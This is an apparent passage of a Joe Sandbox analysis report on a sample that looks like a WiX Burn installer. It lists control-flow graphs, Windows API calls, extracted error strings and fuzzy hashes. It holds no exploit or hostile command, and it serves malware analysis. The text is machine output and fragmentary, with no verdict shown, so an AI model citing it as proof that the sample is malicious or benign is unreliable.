818->825 822->742 823->818 832 5d77ce-5d77d3 824->832 833 5d77d5-5d77e4 call 5ccbc5 824->833 825->749 825->824 826->803 835 5d7745-5d774a 826->835 827->742 832->742 836 5d77e9-5d77ed 833->836 835->742 837 5d77ef-5d77f4 836->837 838 5d77f6-5d780d call 5cc8e6 836->838 837->742 838->749 841 5d780f 838->841 841->742
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get manifest stream from container., xrefs: 005D75CC
                                                                                                                                                                                                                                                                                                  • Failed to get unique temporary folder for bootstrapper application., xrefs: 005D77CE
                                                                                                                                                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 005D7759
                                                                                                                                                                                                                                                                                                  • Failed to open attached UX container., xrefs: 005D758E
                                                                                                                                                                                                                                                                                                  • Failed to overwrite the %ls built-in variable., xrefs: 005D76BB
                                                                                                                                                                                                                                                                                                  • Failed to parse command line., xrefs: 005D7667
                                                                                                                                                                                                                                                                                                  • Failed to extract bootstrapper application payloads., xrefs: 005D77EF
                                                                                                                                                                                                                                                                                                  • WixBundleSourceProcessFolder, xrefs: 005D7734
                                                                                                                                                                                                                                                                                                  • Failed to get source process folder from path., xrefs: 005D7725
                                                                                                                                                                                                                                                                                                  • WixBundleElevated, xrefs: 005D76A5, 005D76B6
                                                                                                                                                                                                                                                                                                  • Failed to initialize variables., xrefs: 005D7571
                                                                                                                                                                                                                                                                                                  • Failed to set original source variable., xrefs: 005D776A
                                                                                                                                                                                                                                                                                                  • Failed to open manifest stream., xrefs: 005D75AB
                                                                                                                                                                                                                                                                                                  • Failed to initialize internal cache functionality., xrefs: 005D779F
                                                                                                                                                                                                                                                                                                  • Failed to set source process path variable., xrefs: 005D7709
                                                                                                                                                                                                                                                                                                  • WixBundleUILevel, xrefs: 005D76D6, 005D76E7
                                                                                                                                                                                                                                                                                                  • Failed to load manifest., xrefs: 005D75E8
                                                                                                                                                                                                                                                                                                  • Failed to load catalog files., xrefs: 005D780F
                                                                                                                                                                                                                                                                                                  • Failed to set source process folder variable., xrefs: 005D7745
                                                                                                                                                                                                                                                                                                  • WixBundleSourceProcessPath, xrefs: 005D76F8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                                                                                                                                                                                  • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                                                                                                                                                                                                                                                                  • API String ID: 32694325-1564579409
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4b6f7dbe2f3adec8bc23fad0ac548228e55b1c7f7e8ab090b48aeb9980d374de
                                                                                                                                                                                                                                                                                                  • Instruction ID: f9d9ea67aa49018bef8c6e307b7e811dead9bd995b2fbfcc7f9ec55e4c62ce15
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b6f7dbe2f3adec8bc23fad0ac548228e55b1c7f7e8ab090b48aeb9980d374de
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21A1B872D4461ABADB269AA8CC45FEBBB6DBB08700F010567F515E7240EB30E940D7A0
                                                                                                                                                                                                                                                                                                  Function 005D82BA Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 153COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 842 5d82ba-5d8303 call 5ef8e0 845 5d847c-5d8489 call 5c2195 842->845 846 5d8309-5d8317 GetCurrentProcess call 600879 842->846 851 5d8498-5d84aa call 5ee06f 845->851 852 5d848b 845->852 850 5d831c-5d8329 846->850 853 5d832f-5d833e GetWindowsDirectoryW 850->853 854 5d83b7-5d83c5 GetTempPathW 850->854 859 5d8490-5d8497 call 600237 852->859 855 5d8378-5d8389 call 5c337f 853->855 856 5d8340-5d834a GetLastError 853->856 857 5d83ff-5d8411 UuidCreate 854->857 858 5d83c7-5d83d1 GetLastError 854->858 880 5d838b-5d8390 855->880 881 5d8395-5d83ab call 5c36a3 855->881 861 5d834c-5d8355 856->861 862 5d8357 856->862 867 5d841a-5d842f StringFromGUID2 857->867 868 5d8413-5d8418 857->868 863 5d83de 858->863 864 5d83d3-5d83dc 858->864 859->851 861->862 870 5d835e-5d8373 call 5c3821 862->870 871 5d8359 862->871 872 5d83e5-5d83fa call 5c3821 863->872 873 5d83e0 863->873 864->863 876 5d844d-5d846e call 5c1f13 867->876 877 5d8431-5d844b call 5c3821 867->877 868->859 870->859 871->870 872->859 873->872 889 5d8477 876->889 890 5d8470-5d8475 876->890 877->859 880->859 881->857 892 5d83ad-5d83b2 881->892 889->845 890->859 892->859
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,005C5489), ref: 005D8310
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600879: OpenProcessToken.ADVAPI32(?,00000008,?,005C53BD,00000000,?,?,?,?,?,?,?,005D769D,00000000), ref: 00600897
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600879: GetLastError.KERNEL32(?,?,?,?,?,?,?,005D769D,00000000), ref: 006008A1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,005D769D,00000000), ref: 0060092B
                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 005D8336
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005D8340
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 005D83BD
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005D83C7
                                                                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 005D8406
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to concat Temp directory on windows path for working folder., xrefs: 005D83AD
                                                                                                                                                                                                                                                                                                  • Failed to create working folder guid., xrefs: 005D8413
                                                                                                                                                                                                                                                                                                  • Temp\, xrefs: 005D8395
                                                                                                                                                                                                                                                                                                  • Failed to convert working folder guid into string., xrefs: 005D8446
                                                                                                                                                                                                                                                                                                  • Failed to get temp path for working folder., xrefs: 005D83F5
                                                                                                                                                                                                                                                                                                  • Failed to append bundle id on to temp path for working folder., xrefs: 005D8470
                                                                                                                                                                                                                                                                                                  • %ls%ls\, xrefs: 005D8458
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 005D8364, 005D83EB, 005D843C
                                                                                                                                                                                                                                                                                                  • Failed to ensure windows path for working folder ended in backslash., xrefs: 005D838B
                                                                                                                                                                                                                                                                                                  • Failed to get windows path for working folder., xrefs: 005D836E
                                                                                                                                                                                                                                                                                                  • Failed to copy working folder path., xrefs: 005D848B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                                                                                                                                                                                                  • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 266130487-819636856
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0bbaa04d02bd57f20413a1c36a8a4062bce604d8d235717ddecfdccbb540c72d
                                                                                                                                                                                                                                                                                                  • Instruction ID: be6fb1a43c3edaa2b692bd9cda35652a534351a9f29ce22b844a618baab35e44
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bbaa04d02bd57f20413a1c36a8a4062bce604d8d235717ddecfdccbb540c72d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE412D76E41726BBDB30A6E8CC09FAB7B69BB00B10F158557BA08F7340DE749D4086D5
                                                                                                                                                                                                                                                                                                  Function 005E10FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 893 5e10fb-5e1127 CoInitializeEx 894 5e113b-5e1186 call 5ff483 893->894 895 5e1129-5e1136 call 600237 893->895 901 5e1188-5e11ab call 5c3821 call 600237 894->901 902 5e11b0-5e11d2 call 5ff4a4 894->902 900 5e139e-5e13b0 call 5ee06f 895->900 919 5e1397-5e1398 CoUninitialize 901->919 910 5e128c-5e1297 SetEvent 902->910 911 5e11d8-5e11e0 902->911 912 5e1299-5e12a3 GetLastError 910->912 913 5e12d6-5e12e4 WaitForSingleObject 910->913 915 5e138f-5e1392 call 5ff4b4 911->915 916 5e11e6-5e11ec 911->916 917 5e12a5-5e12ae 912->917 918 5e12b0 912->918 922 5e1318-5e1323 ResetEvent 913->922 923 5e12e6-5e12f0 GetLastError 913->923 915->919 916->915 921 5e11f2-5e11fa 916->921 917->918 924 5e12b4-5e12c4 call 5c3821 918->924 925 5e12b2 918->925 919->900 928 5e11fc-5e11fe 921->928 929 5e1274-5e1287 call 600237 921->929 926 5e135a-5e1360 922->926 927 5e1325-5e132f GetLastError 922->927 930 5e12fd 923->930 931 5e12f2-5e12fb 923->931 966 5e12c9-5e12d1 call 600237 924->966 925->924 939 5e138a 926->939 940 5e1362-5e1365 926->940 934 5e133c 927->934 935 5e1331-5e133a 927->935 937 5e1200 928->937 938 5e1211-5e1214 928->938 929->915 932 5e12ff 930->932 933 5e1301-5e1316 call 5c3821 930->933 931->930 932->933 933->966 944 5e133e 934->944 945 5e1340-5e1355 call 5c3821 934->945 935->934 947 5e1206-5e120f 937->947 948 5e1202-5e1204 937->948 951 5e126e 938->951 952 5e1216 938->952 939->915 949 5e1386-5e1388 940->949 950 5e1367-5e1381 call 5c3821 940->950 944->945 945->966 968 5e1270-5e1272 947->968 948->968 949->915 950->966 951->968 953 5e124e-5e1253 952->953 954 5e125c-5e1261 952->954 955 5e121d-5e1222 952->955 956 5e126a-5e126c 952->956 957 5e122b-5e1230 952->957 958 5e1239-5e123e 952->958 959 5e1247-5e124c 952->959 960 5e1224-5e1229 952->960 961 5e1255-5e125a 952->961 962 5e1232-5e1237 952->962 963 5e1263-5e1268 952->963 964 5e1240-5e1245 952->964 953->929 954->929 955->929 956->929 957->929 958->929 959->929 960->929 961->929 962->929 963->929 964->929 966->915 968->910 968->929
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 005E111D
                                                                                                                                                                                                                                                                                                  • CoUninitialize.COMBASE ref: 005E1398
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                                                  • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3442037557-1168358783
                                                                                                                                                                                                                                                                                                  • Opcode ID: eea513bfe7eab6dc2fc862473ec2db1b4614d3251a3fa108bd4f304f13cce9c1
                                                                                                                                                                                                                                                                                                  • Instruction ID: bbee48c55c8c4ae653f58ece333e6757dbf3e3831503e995fe0837931fd2ce8e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eea513bfe7eab6dc2fc862473ec2db1b4614d3251a3fa108bd4f304f13cce9c1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72517C3BD859E2D7CB2856D78C05EBB3D15BB44720B264765BE81FB2D0D6358C0092DD
                                                                                                                                                                                                                                                                                                  Function 005C42D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 974 5c42d7-5c432e InitializeCriticalSection * 2 call 5d4d05 * 2 979 5c4334 974->979 980 5c4452-5c445c call 5cb48b 974->980 981 5c433a-5c4347 979->981 985 5c4461-5c4465 980->985 983 5c434d-5c4379 lstrlenW * 2 CompareStringW 981->983 984 5c4445-5c444c 981->984 986 5c43cb-5c43f7 lstrlenW * 2 CompareStringW 983->986 987 5c437b-5c439e lstrlenW 983->987 984->980 984->981 988 5c4474-5c447c 985->988 989 5c4467-5c4473 call 600237 985->989 986->984 993 5c43f9-5c441c lstrlenW 986->993 990 5c448a-5c449f call 5c3821 987->990 991 5c43a4-5c43a9 987->991 989->988 1005 5c44a4-5c44ab 990->1005 991->990 994 5c43af-5c43bf call 5c29ce 991->994 997 5c44b6-5c44d0 call 5c3821 993->997 998 5c4422-5c4427 993->998 1007 5c447f-5c4488 994->1007 1008 5c43c5 994->1008 997->1005 998->997 1002 5c442d-5c443d call 5c29ce 998->1002 1002->1007 1011 5c443f 1002->1011 1009 5c44ac-5c44b4 call 600237 1005->1009 1007->1009 1008->986 1009->988 1011->984
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,005C5266,?,?,00000000,?,?), ref: 005C4303
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(000000D0,?,?,005C5266,?,?,00000000,?,?), ref: 005C430C
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,005C5266,?,?,00000000,?,?), ref: 005C4352
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,005C5266,?,?,00000000,?,?), ref: 005C435C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,005C5266,?,?,00000000,?,?), ref: 005C4370
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,005C5266,?,?,00000000,?,?), ref: 005C4380
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,?,?,005C5266,?,?,00000000,?,?), ref: 005C43D0
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,005C5266,?,?,00000000,?,?), ref: 005C43DA
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,005C5266,?,?,00000000,?,?), ref: 005C43EE
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,?,?,005C5266,?,?,00000000,?,?), ref: 005C43FE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3039292287-3209860532
                                                                                                                                                                                                                                                                                                  • Opcode ID: 94eecb505713aa0ee41e9a83512f229a428b9d0a1ff23b093aab4f4a4d42fcb5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 130d5fc8e55124d0314dafac876c3d67270058ce05707b01f119f75ae3834cce
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94eecb505713aa0ee41e9a83512f229a428b9d0a1ff23b093aab4f4a4d42fcb5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B51B571A80215BFDB28DFA8CC96F5B7B6DFF04760F11811AF614D7290D7B0A950CAA4
                                                                                                                                                                                                                                                                                                  Function 005DE7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1014 5de7b4-5de7f1 1015 5de813-5de834 RegisterClassW 1014->1015 1016 5de7f3-5de807 TlsSetValue 1014->1016 1017 5de86e-5de8a5 CreateWindowExW 1015->1017 1018 5de836-5de840 GetLastError 1015->1018 1016->1015 1019 5de809-5de80e 1016->1019 1022 5de8dc-5de8f0 SetEvent 1017->1022 1023 5de8a7-5de8b1 GetLastError 1017->1023 1020 5de84d 1018->1020 1021 5de842-5de84b 1018->1021 1024 5de93d-5de953 UnregisterClassW 1019->1024 1026 5de84f 1020->1026 1027 5de854-5de869 call 5c3821 1020->1027 1021->1020 1025 5de91c-5de927 KiUserCallbackDispatcher 1022->1025 1028 5de8be 1023->1028 1029 5de8b3-5de8bc 1023->1029 1030 5de929 1025->1030 1031 5de8f2-5de8f5 1025->1031 1026->1027 1040 5de935-5de93c call 600237 1027->1040 1033 5de8c5-5de8da call 5c3821 1028->1033 1034 5de8c0 1028->1034 1029->1028 1030->1024 1035 5de92b-5de930 1031->1035 1036 5de8f7-5de906 IsDialogMessageW 1031->1036 1033->1040 1034->1033 1035->1040 1036->1025 1039 5de908-5de916 TranslateMessage DispatchMessageW 1036->1039 1039->1025 1040->1024
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(?,?), ref: 005DE7FF
                                                                                                                                                                                                                                                                                                  • RegisterClassW.USER32(?), ref: 005DE82B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005DE836
                                                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000080,00619E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 005DE89D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005DE8A7
                                                                                                                                                                                                                                                                                                  • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 005DE945
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 213125376-288575659
                                                                                                                                                                                                                                                                                                  • Opcode ID: 85e299505a9660dbff6f94a14a99efbf8cb36ae36e690aac1138b65d765d7ad0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4aa0d8b7689e8477dc37c08252d396e7b7af3d264085376d5d353272d2ffbd26
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85e299505a9660dbff6f94a14a99efbf8cb36ae36e690aac1138b65d765d7ad0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C141A372941215ABDB349BA4DC45ADFBFB9FF08760F218127F905AA240D731AD41DBA0
                                                                                                                                                                                                                                                                                                  Function 005CC28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1044 5cc28f-5cc2c1 1045 5cc32b-5cc347 GetCurrentProcess * 2 DuplicateHandle 1044->1045 1046 5cc2c3-5cc2e1 CreateFileW 1044->1046 1049 5cc349-5cc353 GetLastError 1045->1049 1050 5cc381 1045->1050 1047 5cc2e7-5cc2f1 GetLastError 1046->1047 1048 5cc383-5cc389 1046->1048 1051 5cc2fe 1047->1051 1052 5cc2f3-5cc2fc 1047->1052 1053 5cc38b-5cc391 1048->1053 1054 5cc393 1048->1054 1055 5cc355-5cc35e 1049->1055 1056 5cc360 1049->1056 1050->1048 1057 5cc305-5cc318 call 5c3821 1051->1057 1058 5cc300 1051->1058 1052->1051 1059 5cc395-5cc3a3 SetFilePointerEx 1053->1059 1054->1059 1055->1056 1060 5cc367-5cc37f call 5c3821 1056->1060 1061 5cc362 1056->1061 1073 5cc31d-5cc326 call 600237 1057->1073 1058->1057 1064 5cc3da-5cc3e0 1059->1064 1065 5cc3a5-5cc3af GetLastError 1059->1065 1060->1073 1061->1060 1070 5cc3fe-5cc404 1064->1070 1071 5cc3e2-5cc3e6 call 5e1741 1064->1071 1068 5cc3bc 1065->1068 1069 5cc3b1-5cc3ba 1065->1069 1074 5cc3be 1068->1074 1075 5cc3c3-5cc3d8 call 5c3821 1068->1075 1069->1068 1076 5cc3eb-5cc3ef 1071->1076 1073->1070 1074->1075 1082 5cc3f6-5cc3fd call 600237 1075->1082 1076->1070 1079 5cc3f1 1076->1079 1079->1082 1082->1070
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,005CC47F,005C5405,?,?,005C5445), ref: 005CC2D6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005CC2E7
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?), ref: 005CC336
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005CC33C
                                                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005CC33F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005CC349
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005CC39B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005CC3A5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                                                                                                                                                                  • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2619879409-373955632
